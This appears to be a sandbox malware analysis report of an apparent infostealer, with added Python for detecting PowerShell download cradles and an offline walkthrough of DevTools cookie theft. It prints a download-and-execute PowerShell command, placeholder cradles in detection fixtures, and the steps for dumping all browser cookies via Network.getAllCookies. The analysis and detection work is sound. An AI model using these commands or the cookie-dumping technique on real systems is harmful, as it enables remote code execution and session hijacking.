                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035BEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0035BEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035BEEB
                                  • lstrlen.KERNEL32(')"), ref: 0035BEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 0035BF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0035BF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035BF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0035BF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 0035C00C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 883b38480fbf83d0f86b3ad9ecf904d7175a054c83fd0fdf7bcd2876cef8912b
                                  • Instruction ID: 27ee4c938a7a5b5311333cd855f33b8289d13787ed79b3e40fbc684a5043c84a
                                  • Opcode Fuzzy Hash: 883b38480fbf83d0f86b3ad9ecf904d7175a054c83fd0fdf7bcd2876cef8912b
                                  • Instruction Fuzzy Hash: 9461B931E10205ABCB23AFB4AC499AFBBF9AF14301F454425FC09EB251DB34D9599B61
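The record above is the "Powershell download and execute" behaviour: the sample concatenates the hardcoded 32-bit host C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, the argument string -nop -c "iex(New-Object Net.WebClient).DownloadString(' and the closing ')" around a URL that is not visible in these lines, then hands the result to ShellExecuteEx. The detection logic below is an added example, not code from the report: it runs over constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine) with placeholder paths and URLs, triggers on the fetch-then-run pair rather than on one literal string, and annotates two things a responder wants to know at a glance: that the host is the SysWOW64 (32-bit) PowerShell and that the parent runs from a user-writable directory. The variant spellings it also covers (Invoke-Expression, -w hidden, -ep bypass, pwsh.exe) are a generalisation beyond this sample.

```python
"""
Detection logic for a PowerShell download cradle in process-creation telemetry.

Added example, not code from the report. Events are constructed Sysmon-style
records; paths and URLs are placeholders, not indicators from the report.
"""
import re
from typing import Optional

# Features of the cradle this record spells out, plus common variant spellings.
FEATURES = {
    "webclient":      re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I),
    "downloadstring": re.compile(r"\.DownloadString\s*\(", re.I),
    "iex":            re.compile(r"(?<![\w-])(?:iex|Invoke-Expression)(?![\w-])", re.I),
    "noprofile":      re.compile(r"(?<!\S)-no?p(?:rofile)?(?!\S)", re.I),
    "hidden":         re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden(?!\S)", re.I),
    "bypass":         re.compile(r"(?<!\S)-e(?:xecution)?p(?:olicy)?\s+bypass(?!\S)", re.I),
}
URL_RE = re.compile(r"""DownloadString\s*\(\s*['"]([^'"]+)['"]""", re.I)
POWERSHELL_RE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata|downloads)|temp|programdata|public)\\", re.I)


def analyse(event: dict) -> Optional[dict]:
    """Return an alert for a PowerShell process whose command line both fetches
    a string over HTTP and hands it to iex/Invoke-Expression (or at least pulls
    it through Net.WebClient), otherwise None."""
    image = event.get("Image", "")
    if not POWERSHELL_RE.search(image):
        return None
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in FEATURES.items() if rx.search(cmd)]
    if "downloadstring" not in hits or not ({"iex", "webclient"} & set(hits)):
        return None
    url = URL_RE.search(cmd)
    parent = event.get("ParentImage", "")
    notes = []
    if "\\syswow64\\" in image.lower():
        # A 32-bit parent (or, as here, a hardcoded path) ends up in the WOW64
        # PowerShell; admin scripts almost never do.
        notes.append("32-bit (SysWOW64) PowerShell host")
    if USER_WRITABLE_RE.search(parent):
        notes.append("parent runs from a user-writable directory")
    return {
        "severity": "high" if "iex" in hits else "medium",
        "hits": hits,
        "url": url.group(1) if url else None,
        "parent": parent,
        "notes": notes,
    }


# Constructed events. The first mirrors this record with a placeholder URL.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
        "CommandLine": '"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" '
                       '-nop -c "iex(New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage.ps1\')"',
    },
    {   # benign administrative use
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -NoProfile -Command "Get-Process | Out-File C:\\temp\\procs.txt"',
    },
    {   # same cradle, different spelling and host
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Users\victim\Downloads\invoice.exe",
        "CommandLine": 'pwsh.exe -w hidden -ep bypass -c "Invoke-Expression '
                       '(New-Object System.Net.WebClient).DownloadString(\'https://example.invalid/a\')"',
    },
    {   # the strings alone are not enough: not a PowerShell host
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'cmd.exe /c type "DownloadString(New-Object Net.WebClient).txt"',
    },
]


def run(events=SAMPLE_EVENTS) -> list:
    return [analyse(e) for e in events]


if __name__ == "__main__":
    for event, alert in zip(SAMPLE_EVENTS, run()):
        print(event["Image"].rsplit("\\", 1)[-1], "->", alert)
```

Command-line matching is evaded by encoded commands (-enc) and by script files, so pair this with Script Block Logging (Event ID 4104), where the decoded iex/DownloadString text reappears whatever the launcher looked like.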
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036184F
                                  • lstrlen.KERNEL32(00F96080), ref: 00361860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003618C1
                                  • lstrlen.KERNEL32(00374FA0), ref: 003618D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003618F4
                                  • lstrcat.KERNEL32(00000000,00374FA0), ref: 00361900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036192F
                                  • lstrlen.KERNEL32(00FA8AA8), ref: 00361945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003619A6
                                  • lstrlen.KERNEL32(00374FA0), ref: 003619B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003619D9
                                  • lstrcat.KERNEL32(00000000,00374FA0), ref: 003619E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A14
                                  • lstrlen.KERNEL32(00FA8B18), ref: 00361A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A8B
                                  • lstrlen.KERNEL32(00FA8B38), ref: 00361AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: ee77dfc9597f8436b64d0867aff68f458f77e365e970579e5a7d75b1b6d14049
                                  • Instruction ID: 8557e961e4fe38ba2919de38d4b5d62305b5b2037ce4b388aa8db12f6f24c9d6
                                  • Opcode Fuzzy Hash: ee77dfc9597f8436b64d0867aff68f458f77e365e970579e5a7d75b1b6d14049
                                  • Instruction Fuzzy Hash: B7913171611703AFD7229FB5DC88A2777ECEF14300B598828F88ADB255DB34E895DB60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003547C5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354812
                                  • lstrlen.KERNEL32(00374B60), ref: 0035481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035483A
                                  • lstrcat.KERNEL32(00000000,00374B60), ref: 00354846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003548A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003548CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003548DC
                                  • lstrlen.KERNEL32(?), ref: 003548F0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003549B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003549E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: e8fbd3ff592b5c77f770bf79e7ee2b9eab765bf589113f295d32771504be1ce1
                                  • Instruction ID: 9bb74764a4960a87552eb62eda93722a15e492d0fe111a422dd48166b89a1f0e
                                  • Opcode Fuzzy Hash: e8fbd3ff592b5c77f770bf79e7ee2b9eab765bf589113f295d32771504be1ce1
                                  • Instruction Fuzzy Hash: CBB15C31A112069BCB27EF64E889DAF77E5AF54305F454528FC46AF321DB30EC598BA0
                                  APIs
                                    • Part of subcall function 003490C0: InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 003490DF
                                    • Part of subcall function 003490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003490FC
                                    • Part of subcall function 003490C0: InternetCloseHandle.WININET(00000000), ref: 00349109
                                  • strlen.MSVCRT ref: 003492E1
                                  • strlen.MSVCRT ref: 003492FA
                                    • Part of subcall function 00348980: std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                  • strlen.MSVCRT ref: 00349399
                                  • strlen.MSVCRT ref: 003493E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00349547
                                  • lstrcat.KERNEL32(?,00371794), ref: 00349559
                                  • lstrcat.KERNEL32(?,?), ref: 0034956A
                                  • lstrcat.KERNEL32(?,00374B98), ref: 0034957C
                                  • lstrcat.KERNEL32(?,?), ref: 0034958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 0034959F
                                  • lstrlen.KERNEL32(?), ref: 003495B6
                                  • lstrlen.KERNEL32(?), ref: 003495DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00349614
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 56da717adf788a78b34bee850632b90b2348a81b3fc221daccb67e6a281efb52
                                  • Instruction ID: 0c4e1fa6d07b73b2afa7b194e70bc726622e6af6a63667d8d66acded05b36ff4
                                  • Opcode Fuzzy Hash: 56da717adf788a78b34bee850632b90b2348a81b3fc221daccb67e6a281efb52
                                  • Instruction Fuzzy Hash: A7E11871E10218DBDF12DFA8D885ADEBBF5AF48310F5044AAE509AB341DB34AE45CF61
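The record above fetches http://localhost:9229/json with WinINet and carries the strings ws://localhost:9229, /devtools, cookies and .txt. That is the DevTools discovery endpoint: it returns a JSON list of debuggable targets, each with a webSocketDebuggerUrl under /devtools/, and over that websocket the Network.getAllCookies method hands back every cookie of the browser session, httpOnly ones included and already decrypted by the browser itself, which sidesteps on-disk cookie database protection. Which process the sample expects on port 9229 is not visible here (9229 is the Node inspector default; Chromium browsers answer on whatever --remote-debugging-port they were started with, and the /devtools/ path points at a Chromium page target). The walkthrough below is an added example, not code from the report or the sample, and runs offline: the discovery document and the CDP reply are constructed stand-ins with dummy ids and cookie values, and the cookies.txt layout is an assumption, since the report shows only the "cookies" and ".txt" fragments.

```python
"""
Protocol walkthrough for the localhost:9229 strings: DevTools discovery,
one CDP request, and the reply rendered as a cookies.txt file.

Added example, not code from the report or the sample. DISCOVERY_JSON and
CDP_REPLY are constructed stand-ins (dummy target id, dummy cookie values).
"""
import json
from urllib.parse import urlparse

# What GET http://localhost:9229/json returns from a Chromium-based browser with
# remote debugging enabled (field names follow the DevTools discovery format).
DISCOVERY_JSON = json.dumps([{
    "description": "",
    "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/0A1B2C3D4E5F",
    "id": "0A1B2C3D4E5F",
    "title": "New Tab",
    "type": "page",
    "url": "chrome://newtab/",
    "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/0A1B2C3D4E5F",
}])

# Constructed reply to Network.getAllCookies over that websocket.
CDP_REPLY = json.dumps({"id": 1, "result": {"cookies": [
    {"name": "session", "value": "dummy-session-token", "domain": ".example.invalid",
     "path": "/", "expires": 1900000000, "size": 26, "httpOnly": True,
     "secure": True, "session": False, "sameSite": "Lax"},
    {"name": "csrftoken", "value": "dummy-csrf", "domain": "example.invalid",
     "path": "/", "expires": -1, "size": 19, "httpOnly": False,
     "secure": False, "session": True, "sameSite": "Strict"},
]}})


def pick_debugger_url(discovery: str, host: str = "localhost", port: int = 9229) -> str:
    """Step 1: from the /json document, choose a target's websocket URL, accepting
    only ws:// on the expected loopback host and port with a /devtools/ path."""
    for target in json.loads(discovery):
        ws = target.get("webSocketDebuggerUrl", "")
        u = urlparse(ws)
        if (u.scheme == "ws" and u.hostname == host and u.port == port
                and u.path.startswith("/devtools/")):
            return ws
    raise LookupError("no debuggable target advertised")


def cdp_request(msg_id: int, method: str, params: dict = None) -> str:
    """Step 2: one CDP JSON-RPC frame as sent over that websocket."""
    frame = {"id": msg_id, "method": method}
    if params:
        frame["params"] = params
    return json.dumps(frame)


def cookies_to_netscape(reply: str) -> str:
    """Step 3: render the getAllCookies result as Netscape cookies.txt lines
    (domain, include-subdomains, path, secure, expiry, name, value). Assumed
    layout; the report does not show what the sample actually writes."""
    cookies = json.loads(reply)["result"]["cookies"]
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        expires = int(c["expires"]) if c.get("expires", -1) > 0 else 0  # 0 = session cookie
        lines.append("\t".join([
            c["domain"],
            "TRUE" if c["domain"].startswith(".") else "FALSE",
            c["path"],
            "TRUE" if c["secure"] else "FALSE",
            str(expires),
            c["name"],
            c["value"],
        ]))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print("debugger:", pick_debugger_url(DISCOVERY_JSON))
    print("send    :", cdp_request(1, "Network.getAllCookies"))
    print(cookies_to_netscape(CDP_REPLY))
```

A browser only answers on that port when it was started with remote debugging enabled, so the practical detections are a browser process created with --remote-debugging-port on its command line (by a parent that is not a developer tool) and a loopback TCP connection to that port from a process that is not the browser or a debugger.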
                                  APIs
                                  • memset.MSVCRT ref: 0035D9A1
                                  • memset.MSVCRT ref: 0035D9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035D9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035DA1C
                                  • lstrcat.KERNEL32(?,00FADF28), ref: 0035DA36
                                  • lstrcat.KERNEL32(?,?), ref: 0035DA4A
                                  • lstrcat.KERNEL32(?,00FAC578), ref: 0035DA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035DA95
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035DAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: 6f4b9e2dd1557a9c204ecaef5c2678b160107d31e09abf406ceaff509c822db0
                                  • Instruction ID: 48c72b8401aa1a2f45ac3fd92a383bf450951186c844c402747f9635aabfb817
                                  • Opcode Fuzzy Hash: 6f4b9e2dd1557a9c204ecaef5c2678b160107d31e09abf406ceaff509c822db0
                                  • Instruction Fuzzy Hash: 8AB19271D102599FCB22EF64DC88DEE77B9AF48301F544565F90AEB250DB30AE48DB60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034B330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034B3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B3D9
                                  • lstrlen.KERNEL32(00374C50), ref: 0034B450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B474
                                  • lstrcat.KERNEL32(00000000,00374C50), ref: 0034B480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B4A9
                                  • lstrlen.KERNEL32(00000000), ref: 0034B52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034B55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B587
                                  • lstrlen.KERNEL32(00374AD4), ref: 0034B5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B622
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0034B62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B65E
                                  • lstrlen.KERNEL32(?), ref: 0034B767
                                  • lstrlen.KERNEL32(?), ref: 0034B776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: c43dc13082715fe815276f8cd85071462b2e2e18d17de9a36b75939d797be789
                                  • Instruction ID: 772aabd8214ebed51a68db897e2ed7b45295fbd6ede7e667f70d1e8257e3f944
                                  • Opcode Fuzzy Hash: c43dc13082715fe815276f8cd85071462b2e2e18d17de9a36b75939d797be789
                                  • Instruction Fuzzy Hash: 5E028330A01205CFCB26DF65D888B6AF7F5AF55304F1A8069E8099F361DB35EC96DB90
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • RegOpenKeyExA.ADVAPI32(?,00FAA090,00000000,00020019,?), ref: 003637BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003637F7
                                  • wsprintfA.USER32 ref: 00363822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00363840
                                  • RegCloseKey.ADVAPI32(?), ref: 0036384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00363858
                                  • RegQueryValueExA.ADVAPI32(?,00FAD958,00000000,000F003F,?,?), ref: 003638A1
                                  • lstrlen.KERNEL32(?), ref: 003638B6
                                  • RegQueryValueExA.ADVAPI32(?,00FADAA8,00000000,000F003F,?,00000400), ref: 00363927
                                  • RegCloseKey.ADVAPI32(?), ref: 00363972
                                  • RegCloseKey.ADVAPI32(?), ref: 00363989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: f6fa042174991fc2923e877d39e40b1490e7a70b06806459164b2f17006f07e2
                                  • Instruction ID: d9445bdc17decb7d7701c5336a32519a3a60e9b540faf7a2a14ba823bbc95ce6
                                  • Opcode Fuzzy Hash: f6fa042174991fc2923e877d39e40b1490e7a70b06806459164b2f17006f07e2
                                  • Instruction Fuzzy Hash: D491CC729002089FCB11DFA4DC84AEEB7B9FB48314F15C569F509AB215DB31AE85DFA0
                                  APIs
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 003490DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003490FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00349109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00349166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00349197
                                  • InternetCloseHandle.WININET(00000000), ref: 003491A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003491A9
                                  • strlen.MSVCRT ref: 003491BA
                                  • strlen.MSVCRT ref: 003491ED
                                  • strlen.MSVCRT ref: 0034922E
                                  • strlen.MSVCRT ref: 0034924C
                                    • Part of subcall function 00348980: std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
